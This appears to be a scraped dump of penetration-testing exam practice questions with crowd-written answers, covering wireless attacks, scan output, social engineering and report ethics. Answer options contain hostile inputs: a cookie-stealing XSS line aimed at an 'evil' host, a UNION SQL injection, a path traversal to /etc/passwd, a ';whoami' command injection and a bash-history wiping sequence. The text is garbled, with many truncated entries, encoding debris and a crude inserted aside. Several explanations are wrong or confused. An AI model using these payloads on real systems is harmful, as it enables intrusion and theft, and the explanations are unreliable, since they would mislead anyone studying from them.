A and D would be the BEST options to address the issue. A secret management solution would help protect sensitive information like access keys in the source code management system. A solution to scan for other similar instances of sensitive information would help identify any other instances of access keys that may be present in the system. B, C, E, and F are also important security measures that can be implemented, but they may not directly address the issue of uncovered access keys in the source code management system. B, role-based access control, could help prevent unauthorized access to the source code management system. C, multifactor authentication, could help improve the security of the login process to the source code management system. E, a secure software development life cycle process, could help prevent the introduction of vulnerabilities into the source code management system. F, a trigger to prevent developers from including passwords, could help prevent futu
Which of the following would a company's hunt team be MOST interested in seeing in a final report? A. Executive summary B. Attack TTPs C. Methodology D. Scope details
A company's hunt team (also known as a threat hunting team) would be most interested in seeing the Attack Tactics, Techniques, and Procedures (TTPs) identified during the penetration test in the final report. TTPs provide detailed insights into the methods, tools, and procedures used by attackers to compromise systems or networks. This information helps the hunt team understand potential attack vectors and improve their threat detection and incident response capabilities.
A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives? A. Send an SMS with a spoofed service number including a link to download a malicious application. B. Exploit a vulnerability in the MDM and create a new account and device profile. C. Perform vish
A. Send an SMS with a spoofed service number including a link to download a malicious application is a social-engineering method that, if successful, would MOST likely enable both objectives of gaining access to mobile devices and exfiltrating data from those devices. This method would involve tricking the user into downloading a malicious application through an SMS message that appears to be from a legitimate service or source. Once the user has downloaded the application, the attacker would have access to the device and would be able to exfiltrate data. Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading (C) may be effective in getting the list of device IMEIs, but it does not help in getting access to the device or exfiltrating data. Exploit a vulnerability in the MDM and create a new account and device profile (B) is a technical method, not a social engineering one. Infest a website that is often used by employees with malware target
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.Which of the following steps should the tester take NEXT? A. Send deauthentication frames to the stations. B. Perform jamming on all 2.4GHz and 5GHz channels. C. Set the malicious AP to broadcast within dynamic frequency selection channels. D. Modify the malicious AP configuration to not use a preshared key.
A. Send deauthentication frames to the stations. After deploying a malicious wireless AP that mimics the configuration of the target enterprise WiFi, the next step for the tester should be to try to force nearby wireless stations to connect to the malicious AP. One way to accomplish this is by sending deauthentication frames to the stations. These frames will disconnect the stations from their current connection and make them available to connect to the malicious AP. This is a type of wireless man-in-the-middle (MITM) attack that can allow the tester to capture and analyze the wireless traffic of the connected stations. B. Perform jamming on all 2.4GHz and 5GHz channels. is not a good option as it can cause legal and ethical issues and would be illegal in many countries, it also can cause a disruption to the legitimate wireless network. C. Set the malicious AP to broadcast within dynamic frequency selection channels. is not a good option as it's not a way to force nearby wireless stations to connect to the malicious AP. D. Modify the malicious AP configuration to not use a preshared key. is not a good option as it may make the malicious AP more easily detectable and less effective in capturing wireless traffic.
A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task? A. Steganography B. Metadata removal C. Encryption D. Encode64
A. Steganography Steganography is the practice of hiding information within other data, such as images, audio, or video files. A penetration tester could use steganography to attempt exfiltration of data by hiding sensitive information within email attachments and then trying to send it through the email system. This test can be used to validate the effectiveness of the DLP product by attempting to detect if the DLP system is able to detect the hidden data before it gets exfiltrated. Option B, Metadata removal, doesn't actually help exfiltrating the data, it just removes metadata that could reveal information about the file. Option C, Encryption, is not effective for exfiltration since it's used to protect the data from being intercepted and read by unauthorized parties. Option D, Encode64, is a way to encode data in base64, but it doesn't hide the data, it can make the data unreadable but doesn't hide it.
Which of the following are the MOST important items for prioritizing fixes that should be included in the final report for a penetration test? (Choose two.) A. The CVSS score of the finding B. The network location of the vulnerable device C. The vulnerability identifier D. The client acceptance form E. The name of the person who found the flaw F. The tool used to find the issue
A. The CVSS score of the finding and C. The vulnerability identifier. The CVSS score is important for providing an indication of the severity of the vulnerability and its potential impact. The vulnerability identifier is important for providing a way to cross reference the finding with other sources of information and for tracking the progress of remediation efforts.
Which of the following BEST describe the OWASP Top 10? (Choose two.) A. The most critical risks of web applications B. A list of all the risks of web applications C. The risks defined in order of importance D. A web-application security standard E. A risk-governance and compliance framework F. A checklist of Apache vulnerabilities
A. The most critical risks of web applications C. The risks defined in order of importance The OWASP Top 10 is a list of the most critical web application security risks, as defined by the Open Web Application Security Project (OWASP). The list is updated every three years and it's designed to help organizations understand the most critical risks they should address in order to secure their web applications. The list is in order of importance, meaning that the risks at the top of the list are considered the most critical. The OWASP Top 10 is not a comprehensive list of all the risks of web applications, it's not a web-application security standard, it's not a risk-governance and compliance framework, and it's not a checklist of Apache vulnerabilities. It's a list of the most critical web application security risks that should be addressed in order to secure web applications.
An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information? A. Follow the established data retention and destruction process. B. Report any findings to regulatory oversight groups. C. Publish the findings after the client reviews the report. D. Encrypt and store any client information for future analysis.
After the assessment has been completed and all reports and evidence have been turned over to the client, the next step should be to follow the established data retention and destruction process. This ensures that any client information that was collected during the assessment is handled in a secure and confidential manner. The data retention and destruction process should specify how long the data will be retained, who will have access to it, and how it will be securely destroyed when it is no longer needed. By following this process, the client's information can be protected and kept confidential. Encrypt and store any client information for future analysis, is not appropriate unless the client has given permission to retain and analyze the data. Storing client information without proper authorization would be a breach of confidentiality and could compromise the security of the client's information. Therefore, it is important to follow the established data retention and destruct
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal? A. Wireshark B. Aircrack-ng C. Kismet D. Wifite
Aircrack-ng
Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine? A. Wireshark B. EAPHammer C. Kismet D. Aircrack-ng
Aircrack-ng would be the BEST tool to capture wireless handshakes and reveal a Wi-Fi password from a Windows machine.It can capture wireless handshakes and use various techniques to crack the WPA/WPA2 passphrase.
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.Which of the following is MOST vulnerable to a brute-force attack? A. WPS B. WPA2-EAP C. WPA-TKIP D. WPA2-PSK
Among the listed options, WPS (Wi-Fi Protected Setup) is typically considered the most vulnerable to brute-force attacks. WPS was designed to simplify the process of connecting devices to a wireless network. One of the methods for setting up WPS is the PIN method, which often relies on an 8-digit PIN. Unfortunately, this PIN can be relatively easy to brute-force, especially since the PIN is often checked in two separate 4-digit parts, reducing the total number of possible combinations. WPA2-EAP, WPA-TKIP, and WPA2-PSK are all more robust security mechanisms for WiFi, and they would generally be considered more resistant to brute-force attacks than WPS. So the correct answer to this question is: A. WPS.
Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products? A. Exploit-DB B. Metasploit C. Shodan D. Retina
Among the options provided, both A. Exploit-DB and B. Metasploit are valuable resources for obtaining payloads against specific network infrastructure products. However, Metasploit is a more comprehensive tool that not only provides access to a wide variety of exploits but also allows for the development, testing, and execution of exploit code. Therefore, the BEST resource among the options given is: B. Metasploit
A penetration tester discovers during a recent test that an employee in the accounting department had been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to discourage this type of activity in the future? A. Enforce mandatory employee vacations. B. Implement multifactor authentication. C. Install video surveillance equipment in the office. D. Encrypt pas
Among these options, enforcing mandatory employee vacations (Option A) would be the best recommendation, as it could help uncover fraudulent activities that require continuous action by the employee. It may force the fraudulent employee to delegate his tasks, and inconsistencies might be detected during his absence. However, this measure should be part of a broader strategy to monitor for and prevent insider threats, including implementing robust access controls, segregation of duties, continuous monitoring, and regular audits.
A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network? A. Set up a captive portal with embedded malicious code. B. Capture handshakes from wireless clients to crack. C. Span deauthentication packets to t
An "evil twin" attack is a type of wireless attack where an attacker sets up a rogue wireless access point with a similar name to a legitimate one, in hopes that users will connect to it, allowing the attacker to intercept their traffic. This method would allow the tester to gain access to the wired connection of the laptop user by tricking the user into connecting to the rogue access point. The other options listed (setting up a captive portal with malicious code, capturing handshakes, and sending deauthentication packets) are not appropriate or legal methods in a penetration test, and should not be used by the tester.
A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:U3VQZXIkM2NyZXQhCg==Which of the following commands should the tester use NEXT to decode the contents of the file? A. echo U3VQZXIkM2NyZXQhCg== | base64 ג€"d B. tar zxvf password.txt C. hydra ג€"l svsacct ג€"p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24 D. john --wordlist /usr/share/seclists/rockyou.txt password.txt
Answer: A. echo U3VQZXIkM2NyZXQhCg== | base64 ג€"d Option A is the correct answer. This command will decode the contents of the file using the base64 encoding format, which is commonly used to encode binary data into ASCII characters. The command will take the encoded data in the file, and return the decoded data. Option B is incorrect because the tar command is used to create and extract archives, not decode data. Option C is incorrect because the hydra command is used to conduct brute-force attacks against remote services, not decode data. Option D is incorrect because the john command is used to crack passwords, not decode data.
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective? A. Wait for the next login and perform a downgrade attack on the server. B. Capture traffic using Wireshark. C. Perform a brute-force attack over the server. D. Use an FTP exploit against the server. Reveal Solution Discussion 2
Answer: B. Capture traffic using Wireshark. Option A is incorrect because a downgrade attack is used to take advantage of a vulnerability in a legacy version of a program to gain access to a system. It is not related to FTP credentials. Option C is incorrect because a brute-force attack is used to guess a user's password by systematically trying every possible combination of characters until the correct one is found. This does not help in obtaining FTP credentials. Option D is incorrect because an FTP exploit is used to gain access to a system by exploiting a vulnerability in an FTP server. It is not related to FTP credentials. Option B is the correct answer because Wireshark is a packet analyzer that can be used to capture and analyze network traffic. A penetration tester can use Wireshark to capture traffic from the server and look for credentials that are sent in plaintext. This is the best way to
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address.Which of the following MOST likely describes what happened? A. The penetration tester was testing the wrong assets. B. The planning process failed to ensure all teams were notified. C. The client was not ready for the assessment to start. D. The penetration tester had incorrect contact information.
Answer: B. The planning process failed to ensure all teams were notified. Example: The penetration tester was unaware that the SOC had set up sinkholing on his IP address and was blocked from accessing the client's IP address because the SOC team was not notified of the penetration test.
A tester who is performing a penetration test on a website receives the following output:Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website? A.script>var adr = '../evil.(quizlet being gay)test=' + escape(document.cookie);</scrip B. ../../../../../../../../../../etc/passwd C. /var/www/html/index.php;whoami D. 1 UNION SELECT 1, DATABASE (), 3 --
Answer: D. 1 UNION SELECT 1, DATABASE (), 3 -- Explanation: The output from the tester's penetration test indicates an issue with the mysql_fetch_array() command in the search.php file. This means that the tester is trying to access a MySQL database. Option D is the correct command to further attack the website since it is a SQL injection attack that can be used to access the database. Option A is incorrect since it is an example of a Cross-site Scripting (XSS) attack, which is not relevant to the output of the tester's penetration test. Option B is incorrect since it is a command to access the password file on the server, which is not relevant to the output of the tester's penetration test. Option C is incorrect since it is a command to execute a PHP script, which is not relevant to the output of the tester's penetration test.
Line #!/usr/bin/python3 1 Line from scapy.all import • 2 Line a = 3 IP (dat='10.10.10.10")/UDP (dport=53)/DNS (rd=1, qd=DNSQR (qname='www.comptia.org')) Line b=srl (a, verbose=0) for x in range (b[DNS].count): 4 Line S Line print (b[DNSRR] [x].rdata 6 Which of the following BEST characterizes the function performed by lines 5 and 6? A. Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10 B. Performs a single DNS query for www.comptia.org and prints the raw da
Answer: D. Prints each DNS query result already stored in variable b Explanation: Line 3 of the script creates a packet and stores it in the variable 'a'. Line 4 sends the packet and stores the results in the variable 'b'. Lines 5 and 6 loop through the results stored in 'b' and print each DNS query result stored in that variable.
A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is theMOST likel
Answer: D. The application has the API certificate pinned. This is the most likely reason for the error because the application is unable to validate the certificate issued by the tester's private root CA. Certificate pinning is a process where an application compares the certificate presented by the server with a predefined set of certificates and only accepts connections if the presented certificate is one of the predefined certificates. This means that the application will reject any certificate that is not in the predefined set, even if it is valid.
An Nmap scan of a network switch reveals the following: Nmap scan report for 192.168.1.254 Host is up 10.014s latency), Not shown: 96 closed ports Port State Service 22/tcp open ssh 23/tcp open telnet 60/tcp open http 443/tcp open https Which of the following technical controls will most likely be the FIRST recommendation for this device?
B - System-Hardening Techniques. We have seen that the port 23 for telnet is open. This means credentials are sent in plain text. Disabling this telnet service which is not a necessary service to allow running since the ssh service on port 22 for remote connection is on can be part of system hardening.
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client's cybersecurity tools?(Choose two.) A. Scraping social media sites B. Using the WHOIS lookup tool C. Crawling the client's website D. Phishing company employees E. Utilizing DNS lookup tools F.
B and C is correct. B allows you to get the technical contacts using WHOIS. C allows you to get to billing/sales contacts These methods are passive, meaning they don't involve direct interaction with the target that might raise suspicions or trigger alerts, making them suitable choices for the given scenario. The other options, such as scraping social media sites (A), phishing company employees (D), utilizing DNS lookup tools (E), or conducting wardriving near the client facility (F), may not specifically target the retrieval of technical and billing contacts' email addresses or may involve more intrusive or active methods that could potentially be detected.
During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penet
B. Investigate the penetration tester. Explanation: The first step that the company should take is to investigate the penetration tester's actions to determine the cause of the failure to report the vulnerability and the subsequent loss of data. The company should also review their own policies and procedures to ensure that they are adequate to prevent such an incident from happening again in the future. Option A is not appropriate as the vulnerability existed and it's important to acknowledge it to prevent future breaches. Option C is not the correct action, as the company should investigate the reasons behind the failure to report the vulnerability. Option D is not the only step that the company should take, although it could be considered as part of the investigation if the penetration tester is found to have violated company policy or acted unethically.
The results of an Nmap scan are as follows: Starting Nmap 7.80 (https://nmap.org) at 2021-01-24 01:10 EST Nmap scan report for ( 10.2.1.22 ) Host is up (0.0102s latency). Not shown: 998 filtered ports | Port 80/tcp State open Service http _http-title: 80F 22% RH 1009.1MB (text/html) _http-slowloris-check: I VULNERABLE: Slowloris DoS Attack | <..> Device type: bridge general purpose Running (JUST GUESSING): QEMU (95%) OS CPE: cpe:/a: qemu:qemu No exact OS matches found for host (test conditions
B. IoT/embedded device. The Nmap scan results indicate that the device type being scanned is a bridge general purpose, and that the operating system is QEMU. This is a typical response for an IoT/embedded device. An active directory domain controller, exposed RDP, and print queue would not have similar Nmap scan results.
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types? A. Nessus B. Metasploit C. Burp Suite D. Ethercap
B. Metasploit Metasploit is a widely used exploitation framework that provides a large number of payload modules that can target a broad range of system types. It is designed to be used by penetration testers to exploit vulnerabilities and gain access to systems. It supports a wide range of payloads and exploits, including Windows, Linux, and MacOS systems, as well as mobile devices and IoT devices. Additionally, Metasploit also provides a comprehensive set of post-exploitation modules that allows penetration testers to perform various actions on the target systems, such as gathering system information, escalating privileges, and creating backdoors. All of these features make Metasploit the most comprehensive exploitation suite and the best choice for pentesters who want to cover the broadest range of target systems types.
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following: if(isset($_POST['item']) ) [ echo shell-exec ('webiste") POST [item] Which of the following combinations of tools would the penetration tester use to exploit this script? A. Hydra and crunch B. Netcat and cURL C. Burp Suite and DIRB D. Nmap and OWASP ZAP
B. Netcat and cURL The penetration tester would use cURL to send a HTTP POST request to the script with a crafted parameter in the 'item' field, which would then be passed to the shell_exec function and executed on the server. Netcat could be used to listen for the response or output of the command execution. The other options listed (A, C, D) are not relevant to this specific script and exploit scenario.
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.Which of the following is the BEST way to ensure this is a true positive? A. Run another scanner to compare. B. Perform a manual test on the server. Most Voted C. Check the results on the scanner. D. Look for the vulnerability online.
B. Perform a manual test on the server. Running another scanner to compare (Option A) can help to confirm the results but is not necessarily the best way to ensure the vulnerability is a true positive. Checking the results on the scanner (Option C) and looking for the vulnerability online (Option D) are not reliable methods for confirming the vulnerability. Performing a manual test on the server (Option B) is the best way to ensure the vulnerability is a true positive as it allows the tester to directly interact with the server and confirm the vulnerability exists.
A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network. Which of the following methods will MOST likely work? A. Try to obtain the private key used for S/MIME from the CEO's account. B. Send an email from the CEO's account, requesting a new account. C. Move laterally from the mail server to the domain controller. D. Attempt to escalate privileges on the mail server to gain root access.
B. Send an email from the CEO's account, requesting a new account. Sending an email from the CEO's account, requesting a new account is a likely method to gain access to the network. This method leverages the trust that is placed in the CEO's account and makes it more likely that the request for a new account will be fulfilled without question. The email can be sent to the IT department or the help desk and request for a new account with high level access. This method is more likely to work as it uses social engineering to trick the IT staff into providing access. A. Trying to obtain the private key used for S/MIME from the CEO's account is not likely to work as the private key is usually protected by a password and should be kept secret. C. Moving laterally from the mail server to the domain controller is not likely to work as it requires knowledge of the internal network architecture and may be detected by security controls in place. D. Attempting to escalate privileges on the
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited? A. Cross-site request forgery B. Server-side request forgery C. Remote file inclusion D. Local code inclusion
B. Server-side request forgery Server-side request forgery (SSRF) is an attack vector that allows an attacker to access internal resources that are not normally accessible from outside the network. In this case, the penetration tester has exploited this vulnerability by querying the provider's metadata to get the credentials that the instance is using to authenticate itself. SSRF occurs when an attacker can send a crafted request to a server that results in the server making a request to a third-party resource specified by the attacker.
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.Which of the following tools or techniques would BEST support additional reconnaissance? A. Wardriving B. Shodan C. Recon-ng D. Aircrack-ng
B. Shodan Shodan is a search engine for Internet-connected devices. It allows a user to search for specific types of devices or services, such as cameras, servers, or routers, connected to the Internet. This tool can be useful in identifying additional information about the client's building, such as the make and model of the security cameras, or any other devices connected to the Internet. It can provide additional information that would be useful in identifying potential vulnerabilities that can be exploited during the physical penetration test. Wardriving is a technique to detect wireless access points, Aircrack-ng is a tool that allows you to crack wifi password, Recon-ng is a reconnaissance tool that can be used to gather information about a target, but it is more useful for web-based reconna
Which of the following actions would BEST explain why a testing team would need to reach out to a customer's emergency contact during an assessment? A. To confirm assessment dates B. To escalate the detection of a prior compromise C. To submit the weekly status report D. To announce that testing will begin Reveal Solution Discussion 2
B. To escalate the detection of a prior compromise If the testing team uncovers evidence of a pre-existing compromise (e.g., malware, unauthorized access, etc.), this would represent a critical security issue that the customer needs to address immediately. It would warrant immediate escalation, possibly involving the customer's emergency contact to ensure a rapid response. The other options are generally part of regular communications and wouldn't typically require an emergency contact.
A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place? A. To provide protection against host OS vulnerabilities B. To reduce the probability of a VM escape attack C. To fix any misconfigurations of the hypervisor D. To enable all features of the hypervisor
B. To reduce the probability of a VM escape attack The other options might be related to good practices but do not directly relate to the reason for keeping hypervisors patched. Option A is partially correct but doesn't capture the essence of why hypervisors specifically need to be patched. It's the vulnerability that could lead to a VM escape that makes patching them so critical.
The results of an Nmap scan are as follows: Starting Nmap 7.80 (https://nmap.org) at 2021-01-24 01:10 EST Nmap scan report for ( 192.168.1.1) Host is up (0.0035s latency) . Not shown: 996 filtered ports Port State Service Version 22/tcp open ssh OpenSSH 6.6.1p1 53/tcp open domain 80/tcp open http dnsmasq 2.72 lighttpd 443/tcp open ssl/http httpd Service Info: OS: Linux; Device: router; CPE: cpe:/o:linux : linux_kernel Service detection performed. Please report any incorrect results as https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds Which of the following would be the BEST conclusion about this device? A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory. B. This device is most likely a gateway with in-band management services. C. This device is most likely a proxy server forwarding requests over TCP/443. D. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
Based on the Nmap scan results provided, the BEST conclusion about this device is: B. This device is most likely a gateway with in-band management services. The reason for this conclusion is that the open ports (22, 53, 80, and 443) suggest specific services running on the device. OpenSSH on port 22 indicates SSH (Secure Shell) is available, which is commonly used for remote management. Port 53 with dnsmasq suggests DNS services, and ports 80 and 443 indicate HTTP and HTTPS services. The service info also states that it is a Linux device, and the CPE (Common Platform Enumeration) suggests it is a router. Options A, C, and D are not supported by the provided Nmap scan results and service information. There is no mention of Heartbleed vulnerability, proxy server functionality, or buffer overflow vulnerability in the extracted DNS names from packets. Therefore, option B is the most appropriate conclusion based on the information provided.
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows: ✑ The following request was intercepted going to the network device: GET /login HTTP/1.1 - Host: 10.50.100.16 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 - Accept-Language: en-US,en;q=0.5 -Connection: keep-alive -Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk ✑ Network management interfac
Based on the findings from the penetration test, here are the two recommendations that would be best to add to the recommendations section of the final report: B. Disable or upgrade SSH daemon. The report should recommend either disabling the SSH service if it's not necessary or upgrading it to a more secure version. The currently identified version "Cisco SSH 1.25" may have known vulnerabilities. Upgrading to a more secure version or disabling it if not needed will enhance security. D. Create an out-of-band network for management. It's a good practice to have network management interfaces separated from the production network. This reduces the risk of attacks on network management interfaces affecting the core network. Creating an out-of-band network for management ensures that administrative access to the core network device is more secure and less exposed to potential attacks. Network management interfaces being available on the production network present a security risk. Creating
A penetration tester is reviewing the following SOW prior to engaging with a client.`Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.`Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.) A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement. C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team. D. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address E. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop. F. Retaining the SOW within the pe
Based on the information in the Statement of Work (SOW), the following two behaviors would be considered unethical: C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team - Withholding information about critical vulnerabilities would be a clear breach of ethical responsibility. The penetration tester is obligated to share all relevant findings with the client. D. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address - This action would likely violate confidentiality agreements and professional ethical standards. Sharing client information, including IP addresses, on untrusted forums would potentially expose the client to malicious actors. The other options do not appear to be directly in conflict with the stipulations in the SOW, and thus would not inherently be considered unethical based on the provided information.
A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal? A. Using OpenVAS in default mode B. Using Nessus with credentials C. Using Nmap as the root user D. Using OWASP ZAP
By using credentials, Nessus can authenticate to the target system and perform a more thorough scan, identifying vulnerabilities that may not be detectable through an unauthenticated scan. This can help to reduce false positives and increase the accuracy of the scan results.
A company becomes concerned when the security alarms are triggered during a penetration test.Which of the following should the company do NEXT? A. Halt the penetration test. B. Conduct an incident response. C. Deconflict with the penetration tester. Most Voted D. Assume the alert is from the penetration test.
C gets you to the quickest answer if it was the pen-tester or not. Going with Incident Response can waist time and resources when a simple call to de-conflict can get you the correct answer faster. If the pen-tester states that it wasn't him you can then start incident response if it was you can still document but you know the answer to what happened
A penetration tester gains access to a system and establishes persistence, and then run the following commands: cat /dev/null > temp touch -r .bash_history temp my temp .bash_history Which of the following actions is the tester MOST likely performing? A. Redirecting Bash history to /dev/null B. Making a copy of the user's Bash history to further enumeration C. Covering tracks by clearing the Bash history Most Voted D. Making decoy files on the system to confuse incident responders
C. The Linux command "cat /dev/null > temp; touch -r .bash_history temp; mv temp .bash_history" is a combination of three commands that are executed sequentially: "cat /dev/null > temp" - This command is used to clear the contents of a file called "temp". The contents of the special file "/dev/null" are redirected to "temp", which overwrites any existing data in the file and making the file empty. "touch -r .bash_history temp" - This command updates the timestamp of the file "temp" to match the timestamp of another file called ".bash_history". The "-r" option specifies that the timestamp of the file ".bash_history" is used to update the timestamp of the file "temp". "mv temp .bash_history" - This command renames or moves the file "temp" to ".bash_history". The file "temp" is no longer exist and a new file called ".bash_history" is created. If a file with the same name already exists, it will be overwritten by the file "temp". Overall, this command sequence creates an empty file called ".bash_history" with the same timestamp as an existing file with the same name and removes the original file "temp"
Given the following script: while True: print{"Hello World"} Which of the following describes True? A. A while loop B. A conditional C. A Boolean operator D. An arithmetic operator
C. A Boolean operator
Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data? A. An unknown-environment assessment B. A known-environment assessment C. A red-team assessment D. A compliance-based assessment
C. A red-team assessment A red-team assessment is a type of assessment that simulates a real-world attack scenario, with the objective of identifying and exploiting vulnerabilities in an organization's systems and networks in order to access specific data. The goal of a red-team assessment is to test the organization's security posture, identify vulnerabilities and evaluate the effectiveness of the organization's security controls. Red-team assessments typically focus on the entire attack chain and use a variety of techniques such as reconnaissance, exploitation, and lateral movement in order to achieve their objectives. A known-environment assessment is a type of assessment where the tester has knowledge of the target environment and its infrastructure, an unknown-environment assessment is when the tester has little or no knowledge of the target environment. A compliance-based assessment is a type of assessment that focuses on verifying that an organization's systems and networks
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift.Which of the following social-engineering attacks was the tester utilizing? A. Phishing B. Tailgating C. Baiting D. Shoulder surfing
C. Baiting The penetration tester was utilizing a baiting social-engineering attack in which the tester builds a relationship with the employee over time and eventually gives the employee an external hard drive as a gift. Baiting is a type of social engineering attack in which the attacker lures the victim into performing an action, such as clicking on a link or opening an attachment, by offering something of value, such as a gift or a prize. Phishing is a type of social engineering attack that uses email or other electronic communication methods to trick victims into giving away sensitive information or clicking on a link that leads to malware. Tailgating is a type of social engineering attack in which an attacker follows an authorized person through a secure door or other access point without proper authorization. Shoulder surfing is a type of social engineering attack in which an attacker uses visual means to gather information by watching a victim enter sensitive information.
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify? A. Weak authentication schemes B. Credentials stored in strings C. Buffer overflows D. Non-optimized resource management
C. Buffer overflows Fuzzing is a technique used to identify vulnerabilities in software by providing unexpected or invalid input to the software. The goal of fuzzing is to find bugs and vulnerabilities in the software by stressing its inputs and identifying unexpected behavior. One type of vulnerability that is commonly identified through fuzzing is buffer overflows. A buffer overflow occurs when a program attempts to store more data in a buffer than it can hold, which can lead to a crash or allow an attacker to execute malicious code. It is important to note that options A, B, and D are also potential vulnerabilities that can be identified during a security assessment, but they are not as likely to be identified through fuzzing as buffer overflows. Weak authentication schemes, Credentials stored in strings, and Non-optimized resource management are also important security issues but they are not directly related to fuzzing
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid? A. PLCs will not act upon commands injected over the network. B. Supervisors and controllers are on a separate virtual network by default. C. Controllers will not validate the origin of commands. D. Supervisory systems will detect a malicious injection of code/commands.
C. Controllers will not validate the origin of commands The assumption that controllers will not validate the origin of commands is most likely to be valid. Many legacy industrial control systems (ICS) and supervisory control and data acquisition (SCADA) systems are not designed with security in mind and lack basic security features such as authentication and access controls. As a result, it is common for these systems to accept commands from any source without verifying their origin. This makes them vulnerable to attacks such as command injection, which can be used to disrupt or damage the systems they control. Option A & D are likely to be invalid assumptions, many PLCs can act upon commands injected over the network and supervisory systems can detect malicious injection of code/commands if properly configured. Option B is also likely to be invalid as it is not a common practice, usually, the supervisory systems and PLCs are connected to the same network, and separating them would require additional hardware and configuration steps.
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to: ✑ Have a full TCP connection ✑ Send a `hello` payload ✑ Wait for a response ✑ Send a string of characters longer than 16 bytes Which of the following approaches would BEST support the objective? A. Run nmap -Pn -sV --script vuln <IP address>. B. Employ an OpenVAS simple scan against the TCP port of the host. C. Create a script in the Lua language and use it with NSE. D. Perform a credentialed scan with Nessus.
